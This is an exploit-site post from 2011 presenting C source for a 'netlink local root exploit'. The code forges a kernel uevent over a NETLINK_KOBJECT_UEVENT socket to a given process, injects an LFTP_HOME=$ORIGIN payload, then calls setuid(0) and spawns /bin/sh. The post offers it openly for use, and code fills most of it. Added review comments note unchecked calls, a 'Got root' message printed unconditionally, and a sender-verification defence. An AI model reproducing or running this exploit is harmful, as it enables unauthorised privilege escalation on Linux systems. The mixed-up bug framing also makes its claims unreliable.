
[100Day-(or-so)] NETLINK (Audit/Lftp_home)local root exploit #2

Posted on 25th November 2011 in Exploits

Netlink AUDIT localroot exploit
NETLINK / LFTP_HOME/LD_AUDIT BUG made from PoC and code for the netlink bug!
AWESOME PF_NETLINK overflow mixed with a local LFTP_HOME or LD_AUDIT — the payload could be swapped out for something else, etc.

Anyhow, have fun!

xd– / #Haxnet / #Haxshells free shells service (IPv6 all vhosts are m1n3 b4b1 !

/* netlink-lftp_home bug */
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif

#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0

/* File-scope state shared with main(); nothing else in this listing reads it. */
int socket_fd;                 /* AF_NETLINK socket, set in main() */
struct sockaddr_nl address;    /* used both as the bind() address and as the sendmsg() destination */
struct msghdr msg;             /* message header handed to sendmsg() */
struct iovec iovector;         /* single iovec pointing at the message buffer built in main() */
int sz = 64*1024;              /* NOTE(review): never referenced anywhere in this listing */

/*
 * Builds a NUL-separated "KEY=VALUE" record in the layout of a kernel uevent
 * and sends it over a NETLINK_KOBJECT_UEVENT socket to the netlink port given
 * as argv[1], then waits two seconds and tries to drop into a root shell.
 *
 * Whether any receiver acts on the injected LFTP_HOME variable is not shown in
 * this listing; the "Got root" message is printed unconditionally, and the
 * setuid(0)/setgid(0) calls are not checked, so the exec that follows runs
 * with whatever privilege the process actually has.
 *
 * Defensive reading: a uevent consumer that imports KEY=VALUE pairs from
 * netlink into the environment of helpers it spawns should first verify the
 * sender is the kernel (SO_PASSCRED, sender pid 0) rather than any local
 * process; an unprivileged process sending on NETLINK_KOBJECT_UEVENT is itself
 * a useful audit signal.
 *
 * NOTE(review): implicit "int" return type (pre-C99 form); argc is never
 * checked before argv[1] is read; socket/bind/sendmsg/setuid/setgid return
 * values are all ignored.
 */
main(int argc, char **argv) {
        char sysfspath[SHORT_STRING];
        char subsystem[SHORT_STRING];
        char event[SHORT_STRING];
        char major[SHORT_STRING];
        char minor[SHORT_STRING];
        char message[LONG_STRING];
        char *mp;
        /* Fixed literal values; the buffers are far larger than needed. */
        sprintf(event, "add");
        sprintf(subsystem, "block");
        sprintf(sysfspath, "/dev/foo");
        sprintf(major, "8");
        sprintf(minor, "1");
        memset(&address, 0, sizeof(address));
        address.nl_family = AF_NETLINK;
        /* NOTE(review): argv[1] is dereferenced without checking argc; atoi()
         * gives no error indication for non-numeric input. */
        address.nl_pid = atoi(argv[1]);
        address.nl_groups = 0;           /* unicast to nl_pid, no multicast group */
        /* The same address struct is both the local bind address (below) and
         * the destination of sendmsg(). */
        msg.msg_name = (void*)&address;
        msg.msg_namelen = sizeof(address);
        msg.msg_iov = &iovector;
        msg.msg_iovlen = 1;
        printf("-> PiD: %s\n",argv[1]);
        /* NOTE(review): return value unchecked; a failed socket() yields -1. */
        socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
        /* NOTE(review): return value unchecked. If the port in nl_pid is already
         * owned by another socket this bind() presumably fails and the kernel
         * auto-binds on sendmsg() instead — TODO confirm; either way the code
         * carries on. */
        bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
        /* Each sprintf() writes one record; the "+1" keeps the terminating NUL
         * so the records are NUL-separated, matching the uevent layout. No
         * bounds check against LONG_STRING, but the fixed content here fits. */
        mp = message;
        mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
        mp += sprintf(mp, "ACTION=%s", event) +1;
        mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
        mp += sprintf(mp, "MAJOR=%s", major) +1;
        mp += sprintf(mp, "MINOR=%s", minor) +1;
        mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
        /* Extra variable appended to the record; the receiver that is expected
         * to export it into a helper's environment is not part of this listing. */
        mp += sprintf(mp, "LFTP_HOME=$ORIGIN exec /proc/self/fd/3") +1;
        printf("-> Writing payload ..\n");
        iovector.iov_base = (void*)message;
        iovector.iov_len = (int)(mp-message);   /* total bytes written, incl. NULs */
        /* NOTE(review): buf and buflen are assigned but never used. */
        char *buf;
        int buflen;
        buf = (char *) &msg;
        buflen = (int)(mp-message);
        printf("-> Sending payload ..");   /* no newline: may stay buffered until exit */
        /* NOTE(review): return value unchecked. */
        sendmsg(socket_fd, &msg, 0);
        close(socket_fd);
        /* Fixed delay, presumably to let the receiver process the message. */
        sleep(2);
        /* Printed regardless of whether anything happened on the receiving side. */
        printf("-> Got root, setting up shell ..");
        /* NOTE(review): both calls are unchecked; they only succeed if the
         * process already has the privilege to change its ids. */
        setuid(0);
        setgid(0);
        execl("/bin/sh", "/bin/sh", (void*)0);
        /* NOTE(review): no return statement if execl() fails; the value
         * returned to the caller is then indeterminate. */
}